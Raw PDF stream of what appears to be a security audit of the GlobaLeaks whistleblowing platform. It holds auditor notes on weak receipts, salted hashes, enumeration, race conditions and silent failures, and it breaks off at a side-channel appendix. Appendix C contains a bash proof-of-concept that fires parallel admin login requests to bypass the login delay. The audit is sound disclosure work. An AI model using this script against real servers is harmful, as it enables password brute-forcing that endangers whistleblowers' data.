Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.715366 Tw (We should assume receivers are mutually adversarial. For example, each receiver might be one) Tj T* 0 Tw .038651 Tw (independent journalism organization, and they will compete with each other to get access to \(or DoS\)) Tj T* 0 Tw (each others' Tips.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 534.0236 cm
Q
q
1 0 0 1 62.69291 522.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (DoS by uploading massive files?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 516.0236 cm
Q
q
1 0 0 1 62.69291 462.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 39 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 27 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .526303 Tw (It uses a fixed per-Node salt to hash the receipts. This was probably done so they can put an index) Tj T* 0 Tw (on the table column, but does make reversing the hashes easier \(instant with a 2^34 lookup table\).) Tj T* ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .962651 Tw (Even if they intend to take advantage of indexing and sacrifice offline attack resistance, we should) Tj T* 0 Tw (find out if they explicitly document the tradeoff, and if not suggest they do so.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 456.0236 cm
Q
q
1 0 0 1 62.69291 432.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm 3.276136 Tw 12 TL /F1 10 Tf 0 0 0 rg (There's a ) Tj /F4 10 Tf (CAPTCHA ) Tj /F1 10 Tf (feature for DoS/spam mitigation, might be crackable because of a bad) Tj T* 0 Tw (implementation or the images not being good enough.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 426.0236 cm
Q
q
1 0 0 1 62.69291 402.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm 1.840751 Tw 12 TL /F1 10 Tf 0 0 0 rg (Make sure the security properties the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (developers expect Tor to provide are actually) Tj T* 0 Tw (provided \(confidentiality? authentication? forward secrecy?\).) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 396.0236 cm
Q
q
1 0 0 1 62.69291 192.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 189 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 177 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.618735 Tw (The receipt is implemented by finding a random string that matches a regexp. By default, it's 10) Tj T* 0 Tw (random digits. Problems:) Tj T* ET
Q
Q
q
1 0 0 1 23 171 cm
Q
q
1 0 0 1 23 -3 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 168 cm
Q
q
1 0 0 1 20 168 cm
Q
q
1 0 0 1 20 120 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 33 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 38 Tm .35152 Tw 12 TL /F1 10 Tf 0 0 0 rg (10 digits probably isn't long enough \(especially when you consider birthday attacks\). In the) Tj T* 0 Tw 2.445366 Tw /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (docs, the authors justify 10 digits because it's like a phone number, and) Tj T* 0 Tw .269147 Tw (provides plausible deniability \(it doesn't, really, because what are the chances your friend's) Tj T* 0 Tw (phone number is the same as your ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (receipt?\).) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 114 cm
Q
q
1 0 0 1 20 0 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 99 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 63 cm
q
0 0 0 rg
BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL 2.211235 Tw (The reverse regex code is very confusing to audit. It may be better to use a random) Tj T* 0 Tw .114597 Tw (20-character ASCII string or something... letting the admin change the regex is error prone.) Tj T* 0 Tw 1.197045 Tw (How does it behave when you set the regex to one that only matches one string, or the) Tj T* 0 Tw (empty set?) Tj T* ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 50 Tm /F1 10 Tf 12 TL 1.004147 Tw (Difficulty to audit, potential for operator misconfiguration, and difficulty to analyze / model) Tj T* 0 Tw 1.19748 Tw ("plausible deniability" all count against this feature. The benefits include that an operator) Tj T* 0 Tw .54284 Tw (may know the target WB population and know how to do plausible deniability well... \(Even) Tj T* 0 Tw 1.72436 Tw (then, will a regex suffice? What if instead I want to select a sequence of football team) Tj T* 0 Tw (names?\)) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 0 cm
Q
q
Q
Q
q
1 0 0 1 23 -3 cm
Q
q
Q
Q
q
1 0 0 1 62.69291 186.0236 cm
Q
q
1 0 0 1 62.69291 78.02362 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 93 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 81 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .753516 Tw (Docs say there is a time delay between a Tip being submitted and the receiver\(s\) being notified. Is) Tj T* 0 Tw (this necessary? Does it help?) Tj T* ET
Q
Q
q
1 0 0 1 23 27 cm
q
0 0 0 rg
BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL .526988 Tw (It could help if an attacker can see traffic to and from a Node, but not Node contents. Imagine if the) Tj T* 0 Tw 1.357984 Tw (delay notification rule were: "Wait until there are 1000 submissions, then pick one at random and) Tj T* 0 Tw .416651 Tw (send its notifications." Then there's an anonymity set that evolves with submissions over time and is) Tj T* 0 Tw (somewhat easy to reason about.) Tj T* ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm 2.076651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Anonymity specialists could say much more about this, and they could help by asking the right) Tj T* 0 Tw (questions, which would then let ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (/LA figure out "does it help".) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 76.86614 cm
Q
 
endstream
endobj
% 'R386': class PDFStream 
386 0 obj
% page stream
<< /Length 10836 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 741.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .927318 Tw 12 TL /F1 10 Tf 0 0 0 rg (Interesting, but probably out of scope problem: How to notify past whistleblowers that they may be) Tj T* 0 Tw (compromised after a security bug in ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (is found?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 735.0236 cm
Q
q
1 0 0 1 62.69291 723.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Does password change invalidate existing sessions for that user?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 717.0236 cm
Q
q
1 0 0 1 62.69291 693.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .710542 Tw (What can a WB do if they suspect their receipt is compromised, but not yet taken advantage of, by) Tj T* 0 Tw (an attacker? Can they invalidate it quickly?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 687.0236 cm
Q
q
1 0 0 1 62.69291 675.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Concurrent requests / race condition issues?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 669.0236 cm
Q
q
1 0 0 1 62.69291 645.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .10686 Tw 12 TL /F1 10 Tf 0 0 0 rg (WB should always be using private browsing mode, or at least clear their history. Do the ) Tj /F4 10 Tf (GlobaLeaks) Tj T* 0 Tw /F1 10 Tf (docs / warnings make this clear?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 639.0236 cm
Q
q
1 0 0 1 62.69291 513.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 111 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 27 cm
q
BT 1 0 0 1 0 86 Tm 1.195697 Tw 12 TL /F1 10 Tf 0 0 0 rg (The backend code uses both Twisted and threads. \(Source: grepping for 'thread'.\) Do the threads) Tj T* 0 Tw 1.763314 Tw (break the nice reasoning-about-concurrency that Twisted offers? \(If so, Taylor may have already) Tj T* 0 Tw 1.459147 Tw (found races in ) Tj /F3 10 Tf (authentication.py) Tj /F1 10 Tf (; if not, add a commendation for excluding race conditions.\)) Tj T* 0 Tw 1.708735 Tw (Nathan added: "I can't remember if its ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (or ) Tj /F4 10 Tf (Ooni ) Tj /F1 10 Tf (which uses twisted, but then adds a) Tj T* 0 Tw 1.616905 Tw (dependency which is a multithreaded "task scheduler". So we need to scan the dependencies...") Tj T* 0 Tw .854987 Tw (Also there may be threads hiding places you can't find by grep for 'thread.' It might be worth doing) Tj T* 0 Tw .88936 Tw (some runtime measure of that, i.e. look at the process table while it's running, or monkeypatch the) Tj T* 0 Tw (Python standard library's thread-spawner to debug-print...) Tj T* ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .009213 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj /F3 10 Tf (settings.py ) Tj /F1 10 Tf (there is ) Tj /F3 10 Tf (self.db_thread_pool_size) Tj ( ) Tj (=) Tj ( ) Tj (1) Tj /F1 10 Tf (... not sure what it does. This setting) Tj T* 0 Tw (is used in ) Tj /F3 10 Tf (transact ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (settings.py) Tj /F1 10 Tf (, which is "for managing transactions.") Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 507.0236 cm
Q
q
1 0 0 1 62.69291 459.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 33 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 38 Tm 1.53248 Tw 12 TL /F1 10 Tf 0 0 0 rg (Username enumeration \(or username guess checking\) may be more severe for ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (than) Tj T* 0 Tw .929984 Tw (other web applications, since the receivers log in with their email address, which could reveal their) Tj T* 0 Tw 1.83498 Tw (identity even when email notifications are disabled. Check what ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf ('s threat model says) Tj T* 0 Tw (about this. It probably excludes it since receivers are not supposed to be anonymous.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 453.0236 cm
Q
q
1 0 0 1 62.69291 441.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (What are all the ) Tj /F3 10 Tf (Random.atfork\(\) ) Tj /F1 10 Tf (calls for? Where are the ) Tj /F3 10 Tf (fork\(\)) Tj /F1 10 Tf (?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 435.0236 cm
Q
q
1 0 0 1 62.69291 399.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.29561 Tw (Whistleblowers can log in with the username "wb" and the receipt as their password. Can this be) Tj T* 0 Tw 2.189985 Tw (exploited to give the WB receiver-like authority? Darius notes that when a WB logs out due to) Tj T* 0 Tw (session expiry, they are taken to the admin/receiver login page.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 393.0236 cm
Q
q
1 0 0 1 62.69291 369.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.702485 Tw (Passwords are sent to the server, then hashed. Why not have the JS client hash passwords? It) Tj T* 0 Tw (seems better to never let the server see the passwords, but is there any well-defined benefit?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 363.0236 cm
Q
q
1 0 0 1 62.69291 297.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 51 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 39 cm
q
BT 1 0 0 1 0 14 Tm .786235 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj 0 0 .501961 rg (GLI604) Tj 0 0 0 rg (, there is a comment "this fallback has been implemented because lose the data is worst) Tj T* 0 Tw (than keep data unsafe for a short amount of time." Daira makes a really good point:) Tj T* ET
Q
Q
q
1 0 0 1 23 33 cm
Q
q
1 0 0 1 23 -3 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.335488 Tw (This is a worrying point of view, because it fails to take account of the fact that if an error is) Tj T* 0 Tw .099431 Tw (reported, it's more likely to be fixed for future uses whereas if it silently fails unsafe, then it's very) Tj T* 0 Tw (likely to continue to silently fail unsafe indefinitely.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 23 -3 cm
Q
q
Q
Q
q
1 0 0 1 62.69291 291.0236 cm
Q
q
1 0 0 1 62.69291 279.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The Users Overview doesn't show Admin activity, does it? Should it?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 273.0236 cm
Q
q
1 0 0 1 62.69291 76.86614 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 181.1575 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 181.1575 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (There are usability issues that aren't obviously vulnerabilities, noted for followup:) Tj T* ET
Q
Q
q
1 0 0 1 23 175.1575 cm
Q
q
1 0 0 1 23 13.15748 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 156 cm
Q
q
1 0 0 1 20 156 cm
Q
q
1 0 0 1 20 120 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .193318 Tw (As a receiver, I update my preferences to disable encryption, hit the update button to save) Tj T* 0 Tw .36152 Tw (the change: the page says "Success! Updated your preferences" but reverts them back to) Tj T* 0 Tw (enabled.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 114 cm
Q
q
1 0 0 1 20 90 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 3.06784 Tw (As a new whistleblower on the demo page, having read only minimal docs on the) Tj T* 0 Tw (GlobaLeaks site, it was unclear to me who might read my submission.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 84 cm
Q
q
1 0 0 1 20 48 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.503735 Tw (Tried submitting a tip. At first the Receiver Selection had no receivers, so I went on to) Tj T* 0 Tw .009318 Tw (entering details and uploading a file. Back to Receivers, and now I could select them. Back) Tj T* 0 Tw (to the submission details, and they're gone! And the submit button is no longer active.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 42 cm
Q
q
1 0 0 1 20 18 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.50284 Tw (In Receiver login, you are prompted for a username but what's actually wanted is your) Tj T* 0 Tw (email address.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 12 cm
Q
q
1 0 0 1 20 -12 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.172927 Tw (The 'Danger!' banner at the top has an X at top-right that's an affordance to make it go) Tj T* 0 Tw (away, except it doesn't go away. The X should not exist.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 0 cm
Q
q
Q
Q
q
Q
Q
 
endstream
endobj
% 'R387': class PDFStream 
387 0 obj
% page stream
<< /Length 3348 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 537.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 6 215 Tm  T* ET
q
1 0 0 1 23 -3 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 42 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 171 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 123 cm
q
0 0 0 rg
BT 1 0 0 1 0 50 Tm /F1 10 Tf 12 TL 4.372976 Tw (After the Node server stops \(or, presumably, becomes unreachable\), the frontend) Tj T* 0 Tw 2.135984 Tw (continues to run without clearly failing. For example, I had an admin page open for a) Tj T* 0 Tw 1.01784 Tw (stopped server; I added a profile picture for a receiver, and apparently succeeded, until I) Tj T* 0 Tw 1.728651 Tw (clicked again on the receiver and found its picture still unset. There had been no error) Tj T* 0 Tw (message. \(Note that an attacker could cause a network partition.\)) Tj T* ET
Q
Q
q
1 0 0 1 23 117 cm
Q
q
1 0 0 1 23 -3 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 114 cm
Q
q
1 0 0 1 20 114 cm
Q
q
1 0 0 1 20 30 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 69 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 74 Tm .783828 Tw 12 TL /F1 10 Tf 0 0 0 rg (This kind of an issue can sometimes be turned into an attack. See ) Tj 0 0 .501961 rg (TLSTRUNC) Tj 0 0 0 rg (.) Tj T* 0 Tw 3.708863 Tw (For example, in ) Tj /F3 10 Tf (app/scripts/services.js) Tj /F1 10 Tf (, it looks like the logout will) Tj T* 0 Tw .053059 Tw (appear to the user to have worked, even if the request to DELETE /authentication) Tj T* 0 Tw .232976 Tw (is dropped, because ) Tj /F3 10 Tf (logout_performed\(\) ) Tj /F1 10 Tf (is called in the success and failure) Tj T* 0 Tw 3.745814 Tw (cases. The user will believe they are logged out when they really aren't.) Tj T* 0 Tw 1.212706 Tw /F3 10 Tf (logout_performed\(\) ) Tj /F1 10 Tf (should be named something else if it is also called for) Tj T* 0 Tw (the failure case.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 24 cm
Q
q
1 0 0 1 20 0 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .676905 Tw (Keep an eye out for anywhere it's just assuming a request goes through without) Tj T* 0 Tw (error, or where one request depends on a previous one working.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 0 cm
Q
q
Q
Q
q
1 0 0 1 23 -3 cm
Q
q
Q
Q
q
1 0 0 1 20 36 cm
Q
q
1 0 0 1 20 0 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm 1.217633 Tw 12 TL /F1 10 Tf 0 0 0 rg (As a WB connecting without Tor to a Node configured not to accept me, I see "You are) Tj T* 0 Tw 3.770888 Tw (connecting to the Node not anonymously and this Node only supports anonymous) Tj T* 0 Tw (submissions". No indication what I should do next.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 20 0 cm
Q
q
Q
Q
q
1 0 0 1 23 -3 cm
Q
q
Q
Q
q
1 0 0 1 62.69291 537.0236 cm
Q
q
1 0 0 1 62.69291 537.0236 cm
Q
 
endstream
endobj
% 'R388': class PDFStream 
388 0 obj
% page stream
<< /Length 1952 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 744.0236 cm
q
BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix C. Script for Issue E) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 714.0236 cm
q
BT 1 0 0 1 0 14 Tm .571412 Tw 12 TL /F1 10 Tf 0 0 0 rg (The following script demonstrates how the exponential login delay can be bypassed by sending requests) Tj T* 0 Tw (in parallel. This is discussed in ) Tj 0 0 .501961 rg (Issue E. Parallel Requests Bypass Exponentially Increasing Login Delay) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 708.0236 cm
Q
q
1 0 0 1 62.69291 508.5977 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
q
.787622 0 0 .787622 0 0 cm
q
1 0 0 1 6.6 8.379653 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 570 252 re B*
Q
q
BT 1 0 0 1 0 230 Tm 12 TL /F3 10 Tf 0 0 0 rg (#!/bin/bash) Tj T* (server=192.168.1.72:8082                     # Your GLBackend server) Tj T* (xsrf='4735a6b2c29349368cae50ea0e39c84e'      # XSRF-TOKEN from sniffing HTTP with the server.) Tj T* (logfile=brute) Tj T* (password=oops # 'globaleaks' if you want to succeed) Tj T*  T* (for trial in {00..99}; do) Tj T* (    \() Tj T* (        echo "Start at `date -u '+%s'` seconds") Tj T* (        curl -i \\) Tj T* (            -H 'Accept: application/json, text/plain, */*' \\) Tj T* (            -H 'Content-Type: application/json;charset=UTF-8' \\) Tj T* (            -H "X-XSRF-TOKEN: $xsrf" \\) Tj T* (            -H "Cookie: XSRF-TOKEN=$xsrf" \\) Tj T* (            -d '{"username":"admin","password":"'$password'","role":"admin"}' \\) Tj T* (            $server/authentication 2) Tj (>) Tj (/dev/null) Tj T* (        echo) Tj T* (        echo "Done at `date -u '+%s'` seconds") Tj T* (     \)  ) Tj (>) Tj ($logfile-$trial ) Tj (&) Tj  T* (done) Tj T* ET
Q
Q
Q
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 508.5977 cm
Q
q
1 0 0 1 62.69291 508.5977 cm
Q
 
endstream
endobj
% 'R389': class PDFStream 
389 0 obj
% page stream
<< /Length 3881 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 744.0236 cm
q
BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix D. Side-Channel Attack Proof of Concept) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 702.0236 cm
q
0 0 0 rg
